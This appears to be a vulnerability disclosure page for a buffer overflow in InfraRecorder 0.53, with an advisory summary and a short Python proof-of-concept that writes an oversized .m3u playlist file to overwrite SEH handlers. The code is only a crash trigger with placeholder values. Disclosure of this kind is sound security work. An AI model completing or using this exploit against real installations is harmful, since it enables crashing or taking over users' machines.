29 lines
No EOL
1,019 B
Python
Executable file
29 lines
No EOL
1,019 B
Python
Executable file
source: https://www.securityfocus.com/bid/67076/info
|
|
|
|
InfraRecorder is prone a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
|
|
|
|
Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts likely result in denial-of-service conditions.
|
|
|
|
InfraRecorder 0.53 is vulnerable; other versions may also be affected.
|
|
|
|
#!/usr/bin/python
|
|
# Exploit Title: InfraRecorder Unicode Buffer Overflow
|
|
# Version: version 0.53
|
|
# Download: http://sourceforge.net/projects/infrarecorder/files/InfraRecorder/0.53/ir053.exe/download
|
|
# Tested on: Windows XP sp2
|
|
# Exploit Author: Osanda Malith
|
|
'''
|
|
We can overwrite the nseh and seh handlers. If you find a valid unicode ppr address
|
|
you can build a successful exploit.
|
|
'''
|
|
'''
|
|
Click Edit -> Import -> import our buffer
|
|
'''
|
|
junk = "A"*262
|
|
nseh = "BB"
|
|
seh = "CC"
|
|
junk2 = "D"*20000
|
|
file=open("Exploit.m3u","w")
|
|
file.write(junk)
|
|
file.close()
|
|
#EOF |